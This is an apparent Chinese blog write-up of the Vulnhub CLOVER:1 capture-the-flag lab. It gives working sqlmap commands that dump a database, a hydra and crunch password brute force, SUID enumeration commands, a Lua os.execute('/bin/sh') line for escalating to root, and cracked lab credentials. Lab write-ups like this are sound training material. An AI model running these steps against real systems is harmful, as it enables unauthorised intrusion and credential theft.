Vulnhub_CLOVER: 1

Vulnhub下载地址:链接:https://pan.baidu.com/s/1FNZ4sqZNiuAToJgRtKaeuQ
提取码:ojuz

0x01环境介绍

靶机 ip:10.10.13.52
kali ip:10.10.13.51

0x02信息收集

image
利用nmap扫描出靶机开放21、22、80端口
image

python3 dirmap.py -i http://10.10.13.52 -lcf

利用dirmap扫描80端口有什么神奇的页面,当场捕获 CFIDE/Administrator/
image
再利用dirmap扫一下这个 CFIDE/Administrator/ 发现有一个 login.php
image
image
进行抓包,利用Sqlmap爆破

sqlmap -r /root/桌面/sql.txt --dbs -batch
sqlmap -r /root/桌面/sql.txt --tables -D clover -batch
sqlmap -r /root/桌面/sql.txt --columns -T uses -D clover -batch
sqlmap -r /root/桌面/sql.txt --dump -C id,password,username -T uses -D clover -batch

经过MD5解码 http://md5online.it/

asta/asta$$123

image
image
ssh连接到asta用户
image
发现存在另一用户sword
image
经过翻找,找到存放sword账户密码的文件,但是没有后四位
给出的提示是后四位为数字(虽然CET4过了,但我还是不会,网上翻译走一波)
image
利用crunch生成密码
image
利用hydra进行爆破

sword/P4SsW0rD4286

0x03检测

登陆用户sword
image
查找具有root权限的suid文件,进行SUID提权

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

image
发现一个比较特殊的文件,/usr/games/clover/deamon.sh,进去看看
image
发现是lua的一个脚本语言

0x04利用

在https://gtfobins.github.io/ 搜索lua
执行./deamon.sh -e 'os.execute("/bin/sh")' 获得超级用户权限
image

image
查看 /root/proof.txt 获取flag
image

0x05总结(个人观点,仅供参考)

  • 信息收集用对工具很重要,信息收集也是渗透中最关键的一步
  • 登陆页面不仅可以爆破,也可用mysql爆破
  • ssh和ftp登陆账号密码一般相同
  • https://gtfobins.github.io/ 收集了suid的利用方法,不过比较刁钻,需要配置dns服务器208.67.222.222(仅供参考)才能解析
  • Lua是一种轻量小巧的脚本语言,用标准C语言编写并以源代码形式开放
posted @ 2021-06-07 14:24  zhbkai  阅读(219)  评论(0编辑  收藏  举报